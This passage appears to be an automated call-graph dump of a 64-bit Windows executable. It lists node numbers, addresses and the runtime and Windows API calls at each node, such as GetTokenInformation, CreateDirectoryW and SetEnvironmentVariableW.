7ff69437526c 17224->17225 17227 7ff69436262f 17226->17227 17228 7ff694369400 2 API calls 17227->17228 17229 7ff694362660 17228->17229 17230 7ff694362683 MessageBoxA 17229->17230 17231 7ff69436266f MessageBoxW 17229->17231 17232 7ff694362690 17230->17232 17231->17232 17233 7ff69436c5c0 _log10_special 8 API calls 17232->17233 17234 7ff6943626a0 17233->17234 17234->17162 17236 7ff694372cbe 17235->17236 17237 7ff694372cae 17235->17237 17238 7ff694372cc7 17236->17238 17245 7ff694372cf5 17236->17245 17240 7ff69437a884 _invalid_parameter_noinfo 37 API calls 17237->17240 17241 7ff69437a884 _invalid_parameter_noinfo 37 API calls 17238->17241 17239 7ff694372ced 17239->17203 17239->17208 17239->17211 17239->17213 17240->17239 17241->17239 17242 7ff694374830 45 API calls 17242->17245 17244 7ff694372fa4 17247 7ff69437a884 _invalid_parameter_noinfo 37 API calls 17244->17247 17245->17237 17245->17239 17245->17242 17245->17244 17249 7ff694373610 17245->17249 17275 7ff6943732d8 17245->17275 17305 7ff694372b60 17245->17305 17247->17237 17250 7ff6943736c5 17249->17250 17251 7ff694373652 17249->17251 17252 7ff6943736ca 17250->17252 17253 7ff69437371f 17250->17253 17254 7ff694373658 17251->17254 17255 7ff6943736ef 17251->17255 17256 7ff6943736cc 17252->17256 17257 7ff6943736ff 17252->17257 17253->17255 17265 7ff69437372e 17253->17265 17273 7ff694373688 17253->17273 17261 7ff69437365d 17254->17261 17254->17265 17322 7ff694371bc0 17255->17322 17264 7ff6943736db 17256->17264 17266 7ff69437366d 17256->17266 17329 7ff6943717b0 17257->17329 17263 7ff6943736a0 17261->17263 17261->17266 17261->17273 17274 7ff69437375d 17263->17274 17318 7ff694374430 17263->17318 17264->17255 17267 7ff6943736e0 17264->17267 17265->17274 17336 7ff694371fd0 17265->17336 17266->17274 17308 7ff694373f74 17266->17308 17270 7ff6943745c8 37 API calls 17267->17270 17267->17274 17269 7ff69436c5c0 _log10_special 8 API calls 17271 7ff6943739f3 17269->17271 17270->17273 17271->17245 17273->17274 17343 7ff69437e8c8 17273->17343 17274->17269 17276 7ff6943732f9 17275->17276 17277 7ff6943732e3 17275->17277 17278 7ff694373337 17276->17278 17279 7ff69437a884 _invalid_parameter_noinfo 37 API calls 17276->17279 17277->17278 17280 7ff6943736c5 17277->17280 17281 7ff694373652 17277->17281 17278->17245 17279->17278 17282 7ff6943736ca 17280->17282 17283 7ff69437371f 17280->17283 17284 7ff694373658 17281->17284 17285 7ff6943736ef 17281->17285 17286 7ff6943736cc 17282->17286 17287 7ff6943736ff 17282->17287 17283->17285 17288 7ff69437372e 17283->17288 17303 7ff694373688 17283->17303 17284->17288 17292 7ff69437365d 17284->17292 17289 7ff694371bc0 38 API calls 17285->17289 17293 7ff69437366d 17286->17293 17296 7ff6943736db 17286->17296 17290 7ff6943717b0 38 API calls 17287->17290 17295 7ff694371fd0 38 API calls 17288->17295 17304 7ff69437375d 17288->17304 17289->17303 17290->17303 17291 7ff694373f74 47 API calls 17291->17303 17292->17293 17294 7ff6943736a0 17292->17294 17292->17303 17293->17291 17293->17304 17297 7ff694374430 47 API calls 17294->17297 17294->17304 17295->17303 17296->17285 17298 7ff6943736e0 17296->17298 17297->17303 17300 7ff6943745c8 37 API calls 17298->17300 17298->17304 17299 7ff69436c5c0 _log10_special 8 API calls 17301 7ff6943739f3 17299->17301 17300->17303 17301->17245 17302 7ff69437e8c8 47 API calls 17302->17303 17303->17302 17303->17304 17304->17299 17356 7ff694370d84 17305->17356 17309 7ff694373f96 17308->17309 17310 7ff694370bf0 12 API calls 17309->17310 17311 7ff694373fde 17310->17311 17312 7ff69437e5e0 46 API calls 17311->17312 17313 7ff6943740b1 17312->17313 17314 7ff694374830 45 API calls 17313->17314 17316 7ff6943740d3 17313->17316 17314->17316 17315 7ff694374830 45 API calls 17317 7ff69437415c 17315->17317 17316->17315 17316->17316 17316->17317 17317->17273 17319 7ff6943744b0 17318->17319 17320 7ff694374448 17318->17320 17319->17273 17320->17319 17321 7ff69437e8c8 47 API calls 17320->17321 17321->17319 17323 7ff694371bf3 17322->17323 17324 7ff694371c22 17323->17324 17326 7ff694371cdf 17323->17326 17325 7ff694370bf0 12 API calls 17324->17325 17328 7ff694371c5f 17324->17328 17325->17328 17327 7ff69437a884 _invalid_parameter_noinfo 37 API calls 17326->17327 17327->17328 17328->17273 17331 7ff6943717e3 17329->17331 17330 7ff694371812 17332 7ff694370bf0 12 API calls 17330->17332 17335 7ff69437184f 17330->17335 17331->17330 17333 7ff6943718cf 17331->17333 17332->17335 17334 7ff69437a884 _invalid_parameter_noinfo 37 API calls 17333->17334 17334->17335 17335->17273 17337 7ff694372003 17336->17337 17338 7ff694372032 17337->17338 17340 7ff6943720ef 17337->17340 17339 7ff694370bf0 12 API calls 17338->17339 17342 7ff69437206f 17338->17342 17339->17342 17341 7ff69437a884 _invalid_parameter_noinfo 37 API calls 17340->17341 17341->17342 17342->17273 17344 7ff69437e8f0 17343->17344 17345 7ff69437e935 17344->17345 17346 7ff694374830 45 API calls 17344->17346 17349 7ff69437e8f5 memcpy_s 17344->17349 17352 7ff69437e91e memcpy_s 17344->17352 17345->17349 17345->17352 17353 7ff694380858 17345->17353 17346->17345 17347 7ff69437a884 _invalid_parameter_noinfo 37 API calls 17347->17349 17349->17273 17352->17347 17352->17349 17355 7ff69438087c WideCharToMultiByte 17353->17355 17357 7ff694370dc3 17356->17357 17358 7ff694370db1 17356->17358 17361 7ff694370dd0 17357->17361 17364 7ff694370e0d 17357->17364 17359 7ff694374f78 memcpy_s 11 API calls 17358->17359 17360 7ff694370db6 17359->17360 17362 7ff69437a950 _invalid_parameter_noinfo 37 API calls 17360->17362 17363 7ff69437a884 _invalid_parameter_noinfo 37 API calls 17361->17363 17369 7ff694370dc1 17362->17369 17363->17369 17365 7ff694370eb6 17364->17365 17366 7ff694374f78 memcpy_s 11 API calls 17364->17366 17367 7ff694374f78 memcpy_s 11 API calls 17365->17367 17365->17369 17370 7ff694370eab 17366->17370 17368 7ff694370f60 17367->17368 17371 7ff69437a950 _invalid_parameter_noinfo 37 API calls 17368->17371 17369->17245 17372 7ff69437a950 _invalid_parameter_noinfo 37 API calls 17370->17372 17371->17369 17372->17365 17376 7ff69437ecad 17373->17376 17374 7ff69437ecb2 17375 7ff694374f78 memcpy_s 11 API calls 17374->17375 17379 7ff69437524d 17374->17379 17381 7ff69437ecbc 17375->17381 17376->17374 17378 7ff69437ecfc 17376->17378 17376->17379 17377 7ff69437a950 _invalid_parameter_noinfo 37 API calls 17377->17379 17378->17379 17380 7ff694374f78 memcpy_s 11 API calls 17378->17380 17379->17217 17379->17224 17380->17381 17381->17377 17383 7ff6943782c8 17382->17383 17384 7ff6943782b5 17382->17384 17392 7ff694377f2c 17383->17392 17385 7ff694374f78 memcpy_s 11 API calls 17384->17385 17387 7ff6943782ba 17385->17387 17388 7ff69437a950 _invalid_parameter_noinfo 37 API calls 17387->17388 17389 7ff6943782c6 17388->17389 17389->16366 17399 7ff694380348 EnterCriticalSection 17392->17399 17401 7ff6943687a1 GetTokenInformation 17400->17401 17403 7ff694368823 __std_exception_destroy 17400->17403 17402 7ff6943687c2 GetLastError 17401->17402 17404 7ff6943687cd 17401->17404 17402->17403 17402->17404 17405 7ff69436883c 17403->17405 17406 7ff694368836 CloseHandle 17403->17406 17404->17403 17407 7ff6943687e9 GetTokenInformation 17404->17407 17405->16371 17406->17405 17407->17403 17408 7ff69436880c 17407->17408 17408->17403 17409 7ff694368816 ConvertSidToStringSidW 17408->17409 17409->17403 17411 7ff69436c8c0 17410->17411 17412 7ff694362b74 GetCurrentProcessId 17411->17412 17413 7ff6943626b0 48 API calls 17412->17413 17414 7ff694362bc7 17413->17414 17415 7ff694374c48 48 API calls 17414->17415 17416 7ff694362c10 MessageBoxW 17415->17416 17417 7ff69436c5c0 _log10_special 8 API calls 17416->17417 17418 7ff694362c40 17417->17418 17418->16381 17420 7ff6943625e5 17419->17420 17421 7ff694374c48 48 API calls 17420->17421 17422 7ff694362604 17421->17422 17422->16390 17458 7ff694378804 17423->17458 17427 7ff6943681cc 17426->17427 17428 7ff694369400 2 API calls 17427->17428 17429 7ff6943681eb 17428->17429 17430 7ff694368206 ExpandEnvironmentStringsW 17429->17430 17431 7ff6943681f3 17429->17431 17433 7ff69436822c __std_exception_destroy 17430->17433 17432 7ff694362810 49 API calls 17431->17432 17434 7ff6943681ff __std_exception_destroy 17432->17434 17435 7ff694368230 17433->17435 17436 7ff694368243 17433->17436 17499 7ff6943815c8 17458->17499 17558 7ff694381340 17499->17558 17698 7ff69436455a 17697->17698 17699 7ff694369400 2 API calls 17698->17699 17700 7ff69436457f 17699->17700 17701 7ff69436c5c0 _log10_special 8 API calls 17700->17701 17702 7ff6943645a7 17701->17702 17702->16434 17704 7ff694367e1e 17703->17704 17705 7ff694361c80 49 API calls 17704->17705 17708 7ff694367f42 17704->17708 17712 7ff694367ea5 17705->17712 17706 7ff69436c5c0 _log10_special 8 API calls 17707 7ff694367f73 17706->17707 17707->16434 17708->17706 17709 7ff694361c80 49 API calls 17709->17712 17710 7ff694364550 10 API calls 17710->17712 17711 7ff694367efb 17713 7ff694369400 2 API calls 17711->17713 17712->17708 17712->17709 17712->17710 17712->17711 17714 7ff694367f13 CreateDirectoryW 17713->17714 17714->17708 17714->17712 17716 7ff694361637 17715->17716 17717 7ff694361613 17715->17717 17718 7ff6943645b0 108 API calls 17716->17718 17838 7ff694361050 17717->17838 17721 7ff69436164b 17718->17721 17720 7ff694361618 17722 7ff69436162e 17720->17722 17725 7ff694362710 54 API calls 17720->17725 17723 7ff694361653 17721->17723 17724 7ff694361682 17721->17724 17722->16434 17726 7ff694374f78 memcpy_s 11 API calls 17723->17726 17727 7ff6943645b0 108 API calls 17724->17727 17725->17722 17728 7ff694361658 17726->17728 17729 7ff694361696 17727->17729 17730 7ff694362910 54 API calls 17728->17730 17731 7ff6943616b8 17729->17731 17732 7ff69436169e 17729->17732 17735 7ff694361671 17730->17735 17734 7ff694370744 73 API calls 17731->17734 17733 7ff694362710 54 API calls 17732->17733 17736 7ff6943616ae 17733->17736 17737 7ff6943616cd 17734->17737 17735->16434 17740 7ff6943700bc 74 API calls 17736->17740 17738 7ff6943616f9 17737->17738 17739 7ff6943616d1 17737->17739 17764 7ff69436717b 17763->17764 17766 7ff694367134 17763->17766 17764->16434 17766->17764 17906 7ff694375094 17766->17906 17768 7ff694364191 17767->17768 17769 7ff6943644d0 49 API calls 17768->17769 17770 7ff6943641cb 17769->17770 17771 7ff6943644d0 49 API calls 17770->17771 17772 7ff6943641db 17771->17772 17773 7ff6943641fd 17772->17773 17774 7ff69436422c 17772->17774 17937 7ff694364100 17773->17937 17775 7ff694364100 51 API calls 17774->17775 17777 7ff69436422a 17775->17777 17778 7ff69436428c 17777->17778 17779 7ff694364257 17777->17779 17781 7ff694364100 51 API calls 17778->17781 17944 7ff694367ce0 17779->17944 17812 7ff694361c80 49 API calls 17811->17812 17813 7ff694364464 17812->17813 17813->16434 17839 7ff6943645b0 108 API calls 17838->17839 17840 7ff69436108c 17839->17840 17841 7ff6943610a9 17840->17841 17842 7ff694361094 17840->17842 17844 7ff694370744 73 API calls 17841->17844 17843 7ff694362710 54 API calls 17842->17843 17849 7ff6943610a4 __std_exception_destroy 17843->17849 17845 7ff6943610bf 17844->17845 17846 7ff6943610e6 17845->17846 17847 7ff6943610c3 17845->17847 17851 7ff6943610f7 17846->17851 17852 7ff694361122 17846->17852 17848 7ff694374f78 memcpy_s 11 API calls 17847->17848 17849->17720 17907 7ff6943750a1 17906->17907 17908 7ff6943750ce 17906->17908 17910 7ff694374f78 memcpy_s 11 API calls 17907->17910 17918 7ff694375058 17907->17918 17909 7ff6943750f1 17908->17909 17912 7ff69437510d 17908->17912 17911 7ff694374f78 memcpy_s 11 API calls 17909->17911 17913 7ff6943750ab 17910->17913 17914 7ff6943750f6 17911->17914 17921 7ff694374fbc 17912->17921 17916 7ff69437a950 _invalid_parameter_noinfo 37 API calls 17913->17916 17919 7ff69437a950 _invalid_parameter_noinfo 37 API calls 17914->17919 17917 7ff6943750b6 17916->17917 17917->17766 17918->17766 17920 7ff694375101 17919->17920 17920->17766 17922 7ff694374fdb 17921->17922 17923 7ff694374fe0 17921->17923 17922->17920 17923->17922 17924 7ff69437b1c0 __FrameHandler3::FrameUnwindToEmptyState 45 API calls 17923->17924 17925 7ff694374ffb 17924->17925 17929 7ff69437d9f4 17925->17929 17930 7ff69437da09 17929->17930 17931 7ff69437501e 17929->17931 17930->17931 17938 7ff694364126 17937->17938 17939 7ff6943749f4 49 API calls 17938->17939 18001 7ff694375f38 18000->18001 18002 7ff694375f5e 18001->18002 18005 7ff694375f91 18001->18005 18003 7ff694374f78 memcpy_s 11 API calls 18002->18003 18004 7ff694375f63 18003->18004 18006 7ff69437a950 _invalid_parameter_noinfo 37 API calls 18004->18006 18007 7ff694375f97 18005->18007 18008 7ff694375fa4 18005->18008 18012 7ff694364606 18006->18012 18009 7ff694374f78 memcpy_s 11 API calls 18007->18009 18019 7ff69437ac98 18008->18019 18009->18012 18012->16459 18032 7ff694380348 EnterCriticalSection 18019->18032 18392 7ff694377968 18391->18392 18395 7ff694377444 18392->18395 18394 7ff694377981 18394->16469 18396 7ff69437748e 18395->18396 18397 7ff69437745f 18395->18397 18405 7ff6943754dc EnterCriticalSection 18396->18405 18398 7ff69437a884 _invalid_parameter_noinfo 37 API calls 18397->18398 18400 7ff69437747f 18398->18400 18400->18394 18407 7ff69436feb3 18406->18407 18408 7ff69436fee1 18406->18408 18409 7ff69437a884 _invalid_parameter_noinfo 37 API calls 18407->18409 18410 7ff69436fed3 18408->18410 18416 7ff6943754dc EnterCriticalSection 18408->18416 18409->18410 18410->16473 18418 7ff69436cb62 RtlLookupFunctionEntry 18417->18418 18419 7ff69436cb78 RtlVirtualUnwind 18418->18419 18420 7ff69436c97b 18418->18420 18419->18418 18419->18420 18421 7ff69436c910 SetUnhandledExceptionFilter UnhandledExceptionFilter GetCurrentProcess TerminateProcess 18420->18421 18423 7ff6943645b0 108 API calls 18422->18423 18424 7ff694361493 18423->18424 18425 7ff69436149b 18424->18425 18426 7ff6943614bc 18424->18426 18427 7ff694362710 54 API calls 18425->18427 18428 7ff694370744 73 API calls 18426->18428 18429 7ff6943614ab 18427->18429 18430 7ff6943614d1 18428->18430 18529 7ff694366365 18528->18529 18530 7ff694361c80 49 API calls 18529->18530 18531 7ff6943663a1 18530->18531 18532 7ff6943663aa 18531->18532 18533 7ff6943663cd 18531->18533 18534 7ff694362710 54 API calls 18532->18534 18535 7ff694364620 49 API calls 18533->18535 18551 7ff6943663c3 18534->18551 18536 7ff6943663e5 18535->18536 18537 7ff694366403 18536->18537 18539 7ff694362710 54 API calls 18536->18539 18540 7ff694364550 10 API calls 18537->18540 18538 7ff69436c5c0 _log10_special 8 API calls 18541 7ff69436336e 18538->18541 18539->18537 18542 7ff69436640d 18540->18542 18541->16582 18559 7ff6943664f0 18541->18559 18543 7ff69436641b 18542->18543 18545 7ff694369070 3 API calls 18542->18545 18545->18543 18551->18538 18818 7ff69437b1c0 __FrameHandler3::FrameUnwindToEmptyState 45 API calls 18817->18818 18819 7ff69437a451 18818->18819 18822 7ff69437a574 18819->18822 18831 7ff6943836c0 18822->18831 18857 7ff694383678 18831->18857 18862 7ff694380348 EnterCriticalSection 18857->18862 18979 7ff694380938 18980 7ff69438095c 18979->18980 18983 7ff69438096c 18979->18983 18981 7ff694374f78 memcpy_s 11 API calls 18980->18981 19004 7ff694380961 18981->19004 18982 7ff694380c4c 18985 7ff694374f78 memcpy_s 11 API calls 18982->18985 18983->18982 18984 7ff69438098e 18983->18984 18986 7ff6943809af 18984->18986 19110 7ff694380ff4 18984->19110 18987 7ff694380c51 18985->18987 18990 7ff694380a21 18986->18990 18991 7ff6943809d5 18986->18991 18996 7ff694380a15 18986->18996 18989 7ff69437a9b8 __free_lconv_mon 11 API calls 18987->18989 18989->19004 18994 7ff69437ec08 memcpy_s 11 API calls 18990->18994 19008 7ff6943809e4 18990->19008 19125 7ff694379730 18991->19125 18992 7ff694380ace 19003 7ff694380aeb 18992->19003 19009 7ff694380b3d 18992->19009 18997 7ff694380a37 18994->18997 18996->18992 18996->19008 19131 7ff69438719c 18996->19131 19000 7ff69437a9b8 __free_lconv_mon 11 API calls 18997->19000 18999 7ff69437a9b8 __free_lconv_mon 11 API calls 18999->19004 19005 7ff694380a45 19000->19005 19001 7ff6943809fd 19001->18996 19011 7ff694380ff4 45 API calls 19001->19011 19002 7ff6943809df 19006 7ff694374f78 memcpy_s 11 API calls 19002->19006 19007 7ff69437a9b8 __free_lconv_mon 11 API calls 19003->19007 19005->18996 19005->19008 19013 7ff69437ec08 memcpy_s 11 API calls 19005->19013 19006->19008 19010 7ff694380af4 19007->19010 19008->18999 19009->19008 19012 7ff69438344c 40 API calls 19009->19012 19018 7ff694380af9 19010->19018 19167 7ff69438344c 19010->19167 19011->18996 19014 7ff694380b7a 19012->19014 19016 7ff694380a67 19013->19016 19017 7ff69437a9b8 __free_lconv_mon 11 API calls 19014->19017 19021 7ff69437a9b8 __free_lconv_mon 11 API calls 19016->19021 19022 7ff694380b84 19017->19022 19019 7ff694380c40 19018->19019 19025 7ff69437ec08 memcpy_s 11 API calls 19018->19025 19024 7ff69437a9b8 __free_lconv_mon 11 API calls 19019->19024 19020 7ff694380b25 19023 7ff69437a9b8 __free_lconv_mon 11 API calls 19020->19023 19021->18996 19022->19008 19022->19018 19023->19018 19024->19004 19026 7ff694380bc8 19025->19026 19027 7ff694380bd9 19026->19027 19028 7ff694380bd0 19026->19028 19030 7ff69437a514 __std_exception_copy 37 API calls 19027->19030 19029 7ff69437a9b8 __free_lconv_mon 11 API calls 19028->19029 19031 7ff694380bd7 19029->19031 19032 7ff694380be8 19030->19032 19036 7ff69437a9b8 __free_lconv_mon 11 API calls 19031->19036 19033 7ff694380c7b 19032->19033 19034 7ff694380bf0 19032->19034 19035 7ff69437a970 _isindst 17 API calls 19033->19035 19176 7ff6943872b4 19034->19176 19038 7ff694380c8f 19035->19038 19036->19004 19040 7ff694380cb8 19038->19040 19050 7ff694380cc8 19038->19050 19044 7ff694374f78 memcpy_s 11 API calls 19040->19044 19041 7ff694380c38 19045 7ff69437a9b8 __free_lconv_mon 11 API calls 19041->19045 19042 7ff694380c17 19043 7ff694374f78 memcpy_s 11 API calls 19042->19043 19046 7ff694380c1c 19043->19046 19047 7ff694380cbd 19044->19047 19045->19019 19048 7ff69437a9b8 __free_lconv_mon 11 API calls 19046->19048 19048->19031 19049 7ff694380fab 19051 7ff694374f78 memcpy_s 11 API calls 19049->19051 19050->19049 19052 7ff694380cea 19050->19052 19053 7ff694380fb0 19051->19053 19054 7ff694380d07 19052->19054 19195 7ff6943810dc 19052->19195 19056 7ff69437a9b8 __free_lconv_mon 11 API calls 19053->19056 19057 7ff694380d7b 19054->19057 19059 7ff694380d2f 19054->19059 19063 7ff694380d6f 19054->19063 19056->19047 19061 7ff694380da3 19057->19061 19064 7ff69437ec08 memcpy_s 11 API calls 19057->19064 19077 7ff694380d3e 19057->19077 19058 7ff694380e2e 19072 7ff694380e4b 19058->19072 19078 7ff694380e9e 19058->19078 19210 7ff69437976c 19059->19210 19061->19063 19066 7ff69437ec08 memcpy_s 11 API calls 19061->19066 19061->19077 19063->19058 19063->19077 19216 7ff69438705c 19063->19216 19068 7ff694380d95 19064->19068 19071 7ff694380dc5 19066->19071 19067 7ff69437a9b8 __free_lconv_mon 11 API calls 19067->19047 19073 7ff69437a9b8 __free_lconv_mon 11 API calls 19068->19073 19069 7ff694380d39 19074 7ff694374f78 memcpy_s 11 API calls 19069->19074 19070 7ff694380d57 19070->19063 19080 7ff6943810dc 45 API calls 19070->19080 19075 7ff69437a9b8 __free_lconv_mon 11 API calls 19071->19075 19076 7ff69437a9b8 __free_lconv_mon 11 API calls 19072->19076 19073->19061 19074->19077 19075->19063 19079 7ff694380e54 19076->19079 19077->19067 19078->19077 19081 7ff69438344c 40 API calls 19078->19081 19083 7ff69438344c 40 API calls 19079->19083 19086 7ff694380e5a 19079->19086 19080->19063 19082 7ff694380edc 19081->19082 19084 7ff69437a9b8 __free_lconv_mon 11 API calls 19082->19084 19085 7ff694380e86 19083->19085 19088 7ff694380ee6 19084->19088 19089 7ff69437a9b8 __free_lconv_mon 11 API calls 19085->19089 19087 7ff694380f9f 19086->19087 19091 7ff69437ec08 memcpy_s 11 API calls 19086->19091 19090 7ff69437a9b8 __free_lconv_mon 11 API calls 19087->19090 19088->19077 19088->19086 19089->19086 19090->19047 19092 7ff694380f2b 19091->19092 19093 7ff694380f3c 19092->19093 19094 7ff694380f33 19092->19094 19096 7ff6943804e4 37 API calls 19093->19096 19095 7ff69437a9b8 __free_lconv_mon 11 API calls 19094->19095 19097 7ff694380f3a 19095->19097 19098 7ff694380f4a 19096->19098 19102 7ff69437a9b8 __free_lconv_mon 11 API calls 19097->19102 19099 7ff694380f52 SetEnvironmentVariableW 19098->19099 19100 7ff694380fdf 19098->19100 19103 7ff694380f97 19099->19103 19104 7ff694380f76 19099->19104 19101 7ff69437a970 _isindst 17 API calls 19100->19101 19106 7ff694380ff3 19101->19106 19102->19047 19107 7ff69437a9b8 __free_lconv_mon 11 API calls 19103->19107 19105 7ff694374f78 memcpy_s 11 API calls 19104->19105 19108 7ff694380f7b 19105->19108 19107->19087 19109 7ff69437a9b8 __free_lconv_mon 11 API calls 19108->19109 19109->19097 19111 7ff694381029 19110->19111 19112 7ff694381011 19110->19112 19113 7ff69437ec08 memcpy_s 11 API calls 19111->19113 19112->18986 19120 7ff69438104d 19113->19120 19114 7ff6943810d2 19116 7ff69437a574 __FrameHandler3::FrameUnwindToEmptyState 45 API calls 19114->19116 19115 7ff6943810ae 19117 7ff69437a9b8 __free_lconv_mon 11 API calls 19115->19117 19118 7ff6943810d8 19116->19118 19117->19112 19119 7ff69437ec08 memcpy_s 11 API calls 19119->19120 19120->19114 19120->19115 19120->19119 19121 7ff69437a9b8 __free_lconv_mon 11 API calls 19120->19121 19122 7ff69437a514 __std_exception_copy 37 API calls 19120->19122 19123 7ff6943810bd 19120->19123 19121->19120 19122->19120 19124 7ff69437a970 _isindst 17 API calls 19123->19124 19124->19114 19126 7ff694379749 19125->19126 19127 7ff694379740 19125->19127 19126->19001 19126->19002 19127->19126 19240 7ff694379208 19127->19240 19132 7ff6943871a9 19131->19132 19133 7ff6943862c4 19131->19133 19135 7ff694374fbc 45 API calls 19132->19135 19134 7ff6943862d1 19133->19134 19140 7ff694386307 19133->19140 19137 7ff694374f78 memcpy_s 11 API calls 19134->19137 19155 7ff694386278 19134->19155 19136 7ff6943871dd 19135->19136 19139 7ff6943871e2 19136->19139 19144 7ff6943871f3 19136->19144 19148 7ff69438720a 19136->19148 19141 7ff6943862db 19137->19141 19138 7ff694386331 19142 7ff694374f78 memcpy_s 11 API calls 19138->19142 19139->18996 19140->19138 19145 7ff694386356 19140->19145 19146 7ff69437a950 _invalid_parameter_noinfo 37 API calls 19141->19146 19143 7ff694386336 19142->19143 19147 7ff69437a950 _invalid_parameter_noinfo 37 API calls 19143->19147 19149 7ff694374f78 memcpy_s 11 API calls 19144->19149 19152 7ff694374fbc 45 API calls 19145->19152 19159 7ff694386341 19145->19159 19150 7ff6943862e6 19146->19150 19147->19159 19153 7ff694387226 19148->19153 19154 7ff694387214 19148->19154 19151 7ff6943871f8 19149->19151 19150->18996 19158 7ff69437a950 _invalid_parameter_noinfo 37 API calls 19151->19158 19152->19159 19156 7ff694387237 19153->19156 19157 7ff69438724e 19153->19157 19160 7ff694374f78 memcpy_s 11 API calls 19154->19160 19155->18996 19473 7ff694386314 19156->19473 19482 7ff694388fbc 19157->19482 19158->19139 19159->18996 19163 7ff694387219 19160->19163 19165 7ff69437a950 _invalid_parameter_noinfo 37 API calls 19163->19165 19165->19139 19166 7ff694374f78 memcpy_s 11 API calls 19166->19139 19168 7ff69438348b 19167->19168 19169 7ff69438346e 19167->19169 19173 7ff694383495 19168->19173 19522 7ff694387ca8 19168->19522 19169->19168 19170 7ff69438347c 19169->19170 19171 7ff694374f78 memcpy_s 11 API calls 19170->19171 19175 7ff694383481 memcpy_s 19171->19175 19529 7ff694387ce4 19173->19529 19175->19020 19177 7ff694374fbc 45 API calls 19176->19177 19178 7ff69438731a 19177->19178 19179 7ff694387328 19178->19179 19541 7ff69437ef94 19178->19541 19544 7ff69437551c 19179->19544 19183 7ff694387414 19185 7ff694387425 19183->19185 19187 7ff69437a9b8 __free_lconv_mon 11 API calls 19183->19187 19184 7ff694374fbc 45 API calls 19186 7ff694387397 19184->19186 19188 7ff694380c13 19185->19188 19190 7ff69437a9b8 __free_lconv_mon 11 API calls 19185->19190 19189 7ff69437ef94 5 API calls 19186->19189 19191 7ff6943873a0 19186->19191 19187->19185 19188->19041 19188->19042 19189->19191 19190->19188 19192 7ff69437551c 14 API calls 19191->19192 19193 7ff6943873fb 19192->19193 19193->19183 19194 7ff694387403 SetEnvironmentVariableW 19193->19194 19194->19183 19196 7ff69438111c 19195->19196 19197 7ff6943810ff 19195->19197 19198 7ff69437ec08 memcpy_s 11 API calls 19196->19198 19197->19054 19199 7ff694381140 19198->19199 19200 7ff6943811a1 19199->19200 19204 7ff69437ec08 memcpy_s 11 API calls 19199->19204 19205 7ff69437a9b8 __free_lconv_mon 11 API calls 19199->19205 19206 7ff6943804e4 37 API calls 19199->19206 19207 7ff6943811b0 19199->19207 19209 7ff6943811c4 19199->19209 19202 7ff69437a9b8 __free_lconv_mon 11 API calls 19200->19202 19201 7ff69437a574 __FrameHandler3::FrameUnwindToEmptyState 45 API calls 19203 7ff6943811ca 19201->19203 19202->19197 19204->19199 19205->19199 19206->19199 19208 7ff69437a970 _isindst 17 API calls 19207->19208 19208->19209 19209->19201 19211 7ff69437977c 19210->19211 19215 7ff694379785 19210->19215 19211->19215 19566 7ff69437927c 19211->19566 19215->19069 19215->19070 19217 7ff694387069 19216->19217 19222 7ff694387096 19216->19222 19218 7ff69438706e 19217->19218 19217->19222 19219 7ff694374f78 memcpy_s 11 API calls 19218->19219 19220 7ff694387073 19219->19220 19224 7ff69437a950 _invalid_parameter_noinfo 37 API calls 19220->19224 19221 7ff6943870da 19223 7ff694374f78 memcpy_s 11 API calls 19221->19223 19222->19221 19225 7ff6943870f9 19222->19225 19238 7ff6943870ce __crtLCMapStringW 19222->19238 19226 7ff6943870df 19223->19226 19227 7ff69438707e 19224->19227 19228 7ff694387115 19225->19228 19229 7ff694387103 19225->19229 19230 7ff69437a950 _invalid_parameter_noinfo 37 API calls 19226->19230 19227->19063 19232 7ff694374fbc 45 API calls 19228->19232 19231 7ff694374f78 memcpy_s 11 API calls 19229->19231 19230->19238 19233 7ff694387108 19231->19233 19234 7ff694387122 19232->19234 19235 7ff69437a950 _invalid_parameter_noinfo 37 API calls 19233->19235 19234->19238 19613 7ff694388b78 19234->19613 19235->19238 19238->19063 19239 7ff694374f78 memcpy_s 11 API calls 19239->19238 19241 7ff69437921d 19240->19241 19242 7ff694379221 19240->19242 19241->19126 19255 7ff69437955c 19241->19255 19263 7ff694382660 19242->19263 19247 7ff694379233 19249 7ff69437a9b8 __free_lconv_mon 11 API calls 19247->19249 19248 7ff69437923f 19289 7ff6943792ec 19248->19289 19249->19241 19252 7ff69437a9b8 __free_lconv_mon 11 API calls 19253 7ff694379266 19252->19253 19254 7ff69437a9b8 __free_lconv_mon 11 API calls 19253->19254 19254->19241 19256 7ff694379585 19255->19256 19257 7ff69437959e 19255->19257 19256->19126 19257->19256 19258 7ff69437ec08 memcpy_s 11 API calls 19257->19258 19259 7ff694380858 WideCharToMultiByte 19257->19259 19260 7ff69437962e 19257->19260 19262 7ff69437a9b8 __free_lconv_mon 11 API calls 19257->19262 19258->19257 19259->19257 19261 7ff69437a9b8 __free_lconv_mon 11 API calls 19260->19261 19261->19256 19262->19257 19264 7ff69438266d 19263->19264 19265 7ff694379226 19263->19265 19308 7ff69437b294 19264->19308 19269 7ff69438299c GetEnvironmentStringsW 19265->19269 19270 7ff6943829cc 19269->19270 19271 7ff69437922b 19269->19271 19272 7ff694380858 WideCharToMultiByte 19270->19272 19271->19247 19271->19248 19273 7ff694382a1d 19272->19273 19274 7ff694382a24 FreeEnvironmentStringsW 19273->19274 19275 7ff69437d66c _fread_nolock 12 API calls 19273->19275 19274->19271 19276 7ff694382a37 19275->19276 19277 7ff694382a48 19276->19277 19278 7ff694382a3f 19276->19278 19279 7ff694380858 WideCharToMultiByte 19277->19279 19280 7ff69437a9b8 __free_lconv_mon 11 API calls 19278->19280 19282 7ff694382a6b 19279->19282 19281 7ff694382a46 19280->19281 19281->19274 19283 7ff694382a79 19282->19283 19284 7ff694382a6f 19282->19284 19286 7ff69437a9b8 __free_lconv_mon 11 API calls 19283->19286 19285 7ff69437a9b8 __free_lconv_mon 11 API calls 19284->19285 19287 7ff694382a77 FreeEnvironmentStringsW 19285->19287 19286->19287 19287->19271 19290 7ff694379311 19289->19290 19291 7ff69437ec08 memcpy_s 11 API calls 19290->19291 19303 7ff694379347 19291->19303 19292 7ff69437934f 19293 7ff69437a9b8 __free_lconv_mon 11 API calls 19292->19293 19294 7ff694379247 19293->19294 19294->19252 19295 7ff6943793c2 19296 7ff69437a9b8 __free_lconv_mon 11 API calls 19295->19296 19296->19294 19297 7ff69437ec08 memcpy_s 11 API calls 19297->19303 19298 7ff6943793b1 19467 7ff694379518 19298->19467 19299 7ff69437a514 __std_exception_copy 37 API calls 19299->19303 19302 7ff6943793e7 19305 7ff69437a970 _isindst 17 API calls 19302->19305 19303->19292 19303->19295 19303->19297 19303->19298 19303->19299 